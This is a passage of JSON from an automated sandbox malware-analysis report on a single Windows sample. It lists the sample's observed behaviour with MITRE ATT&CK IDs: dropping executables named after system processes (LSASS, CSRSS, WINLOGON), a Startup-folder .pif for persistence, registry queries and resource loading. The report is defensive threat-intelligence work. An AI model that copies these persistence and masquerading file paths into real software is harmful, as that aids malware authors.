"API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe.cfg\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe.Local\\\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" trying to access non-existent file \"C:\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" writes file \"c:\\share\\data hapubws.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" writes file \"c:\\share\\d3_08\\new folder.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" writes file \"c:\\windows\\d3_08.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" writes file \"c:\\d3_08.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" writes file \"c:\\windows\\system32\\mrd3_08.scr\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" reads file \"c:\\users\\desktop.ini\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" reads file \"c:\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" connecting to \"\\ThemeApiPort\"\n \"D3_08.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Windows\\D3_08.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Windows\\System32\\MrD3_08.scr\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" queries basic process information of the \"C:\\share\\Data HAPUBWS.exe\" (UID: 3404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" queries basic process information of the \"C:\\share\\D3_08\\New Folder.exe\" (UID: 3404)\n \"D3_08.exe\" queries basic process information of the \"C:\\share\\D3_08\\New Folder.exe\" (UID: 2520)\n \"D3_08.exe\" queries basic process information of the \"C:\\share\\Data HAPUBWS.exe\" (UID: 2520)\n \"IExplorer.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 2088)\n \"IExplorer.exe\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 2088)\n \"CSRSS.EXE\" queries basic process information of the \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\" (UID: 4612)\n \"CSRSS.EXE\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 4612)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00003404]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00005040]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00005040]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00005040]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00003404]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00005040]\n \"IEXPLORER.EXE.67EE4D17.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00005040]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00005040]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00005040]\n \"IEXPLORER.EXE.67EE48F7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00005040]\n \"IEXPLORER.EXE.67EE4660.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE4804.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"PuRn4m4.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [C:\\PuRn4m4.txt]- [targetUID: 00000000-00005040]\n \"desktop.ini\" has type \"Windows desktop.ini\"- Location: [C:\\desktop.ini]- [targetUID: 00000000-00005040]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00003404]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00005040]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00003404]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00005040]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00003404]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00005040]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00003404]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08\\New Folder.exe]- [targetUID: 00000000-00003404]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00005040]\n \"SERVICES.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00005040]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00005040]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00005040]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00005040]\n \"D3_08.EXE.67EE4D0E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00005040]\n \"D3_08.EXE.67EE465D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00005040]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DLLNXOPTIONS\"; Key: \"USEFILTER\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DLLNXOPTIONS\"; Key: \"MSVBVM60.DLL\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00003404)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00002520)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00002088)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00002736)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00002736)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00002736)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00003320)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00003320)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00003320)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': 